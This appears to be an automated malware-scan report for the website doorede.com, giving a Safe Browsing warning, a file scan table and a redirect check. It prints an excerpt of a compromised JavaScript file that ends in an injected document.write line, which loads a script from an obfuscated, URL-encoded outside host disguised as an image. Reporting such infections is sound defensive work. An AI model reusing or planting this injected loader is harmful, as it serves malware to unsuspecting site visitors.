Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=doorede.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://www.doorede.com/ | 200 OK Content-Length: 12891 Content-Type: text/html | clean |
http://www.doorede.com/Scripts/AC_RunActiveContent.js | 200 OK Content-Length: 8446 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) var isIE = (navigator.appVersion.indexOf("MSIE") != -1) ? true : false;
var isWin = (navigator.appVersion.toLowerCase().indexOf("win") != -1) ? true : false; var isOpera = (navigator.userAgent.indexOf("Opera") != -1) ? true : false; function ControlVersion() { var version; var axo; var e; try { axo = new ActiveXObject("ShockwaveFlash.ShockwaveFlash.7"); version = axo.GetVariable("$version"); } catch (e) { case "tabindex": ret.embedAttrs[args[i]] = ret.objAttrs[args[i]] = args[i+1]; break; default: ret.embedAttrs[args[i]] = ret.params[args[i]] = args[i+1]; } } ret.objAttrs["classid"] = classid; if (mimeType) ret.embedAttrs["type"] = mimeType; return ret; } document.write("<script language=javascript src=//%61%64%76%74%65%63%68%2e%63%6f%2e%6b%72/board/upload/right.gif></script>"); Antivirus reports:
| ||
http://www.doorede.com/../Scripts/AC_RunActiveContent.js | 403 Forbidden Content-Length: 32 Content-Type: text/html | clean |
http://www.doorede.com/test404page.js | 404 Not Found Content-Length: 1466 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: doorede.com
Result:
GET / HTTP/1.1
Host: doorede.com
Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: doorede.com
Referer: http://www.google.com/search?q=doorede.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: doorede.com
Referer: http://www.google.com/search?q=doorede.com
Result:
The result is similar to the first query. There are no suspicious redirects found.